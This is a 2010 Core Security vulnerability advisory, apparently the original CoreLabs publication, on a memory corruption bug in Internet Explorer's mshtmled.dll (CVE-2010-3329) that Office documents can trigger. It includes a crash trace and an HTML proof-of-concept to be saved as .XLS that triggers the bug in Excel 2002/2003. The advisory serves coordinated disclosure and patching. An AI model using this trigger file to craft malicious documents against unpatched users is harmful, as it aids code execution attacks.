Core Security - CoreLabs
Microsoft Office HtmlDlgHelper class memory corruption
**Title:**Microsoft Office HtmlDlgHelper class memory corruption
**Advisory Id:**CORE-2010-0517
Advisory URL:http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption
**Date published:**2010-10-12
**Date of last update:**2010-10-12
**Vendors contacted:**Microsoft
**Release mode:**Coordinated release
**Class:**Buffer Overflow [CWE-119]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
CVE Name:CVE-2010-3329
**Bugtraq ID:**N/A
Microsoft Windows is prone to a memory corruption vulnerability when instantiating the HtmlDlgHelper Class Object
in a Microsoft Office Document (ie: .XLS, .DOC). The affected vulnerable module is part of Internet Explorer (mshtmled.dll
). This vulnerability could be used by a remote attacker to execute arbitrary code with the privileges of the user that opened the malicious file.
This vulnerability was discovered by Damiรกn Frizza from Core Security Technologies.
Microsoft Windows is prone to a memory corruption vulnerability when instantiating the HtmlDlgHelper Class Object
(CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b
) in a Microsoft Office Document (ie: .XLS, .DOC). The affected vulnerable module is part of Internet Explorer (mshtmled.dll
). The vulnerability occurs in mshtmled.dll
when the destructor of the CHtmlDlgHelper
class is called and then makes access to uninitialized memory.
The ActiveX control is marked as โNot Safe for Initializationโ, and prompts the user with: โActiveX controls might contain viruses or other security hazards. Do not enable this content unless you trust the source of this fileโ. However, in Office 2003 the bug is triggered even if the user answers โNoโ to the prompt.
The following code is where the vulnerability occurs, when opening a .XLS document on Microsoft Office Excel 2003 (mshtmled.dll
v8.0.6001.18702):
mshtmled!ReleaseInterface:
42b919c0 8bff mov edi,edi
42b919c2 55 push ebp
42b919c3 8bec mov ebp,esp
42b919c5 8b4508 mov eax,dword ptr [ebp+8] ss:0023:0013d104=00310065
42b919c8 85c0 test eax,eax
42b919ca 7406 je mshtmled!ReleaseInterface+0x12 (42b919d2) [br=0]
42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065
42b919ce 50 push eax
42b919cf ff5108 call dword ptr [ecx+8] ds:0023:7d02029c=2a2c277a
eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Stack Trace:
<Unloaded_ion.dll>+0x2a2c2779
mshtmled!ReleaseInterface+0x12
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor'+0xd
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27
VBE6!rtcStrConvVar+0xbd65
VBE6!rtcSetDatabaseLcid+0xa823
EXCEL!Ordinal41+0xd2ad0
EXCEL!Ordinal41+0x14082a
USER32!CallWindowProcW+0x1b
Instruction Address: 0x000000002a2c277a
The following html code demonstrates the bug on Excel 2002/2003. Save the file as .XLS and open it on Excel.
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 10">
</head>
<body link=blue vlink=purple>
<table border="0" width="64">
<col width="64">
<tr>
<td width="64" align="left" valign="top"><![if !vml]><span><![endif]>
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>
<![if !vml]></span><![endif]><span>
<table>
<tr>
<td width="64"></td>
</tr>
</table>
</span></td>
</tr>
<![if supportMisalignedColumns]>
<tr>
<td width="64"></td>
</tr>
<![endif]>
</table>
</body>
</html>
This exploitable condition was reproduced in the following versions of mshtmled.dll
:
mshtmled.dll
v8.0.6001.18702mshtmled.dll
v8.0.6001.18000mshtmled.dll
v7.0.6000.17023mshtmled.dll
v7.0.6000.17080[1] Microsoft security bulletin summary for October 2010 -
[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx.
](<http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx>)[2] Office killbit
[http://support.microsoft.com/kb/983632.
](<http://support.microsoft.com/kb/983632>)[3] This bug was originally investigated in Microsoft Office by Core, but MSRC determined [2010-07-02] that this bug is an exploitable crash in Internet Explorer.
[4] MSRC was not able to reproduce this issue on IE6, however they notifies the code has been determined to exist in this version and the fix will be scoped to address this platform as well.
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com/.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The companyโs flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at <http://www.coresecurity.com>.
The contents of this advisory are copyright ยฉ 2010 Core Security Technologies and ยฉ 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.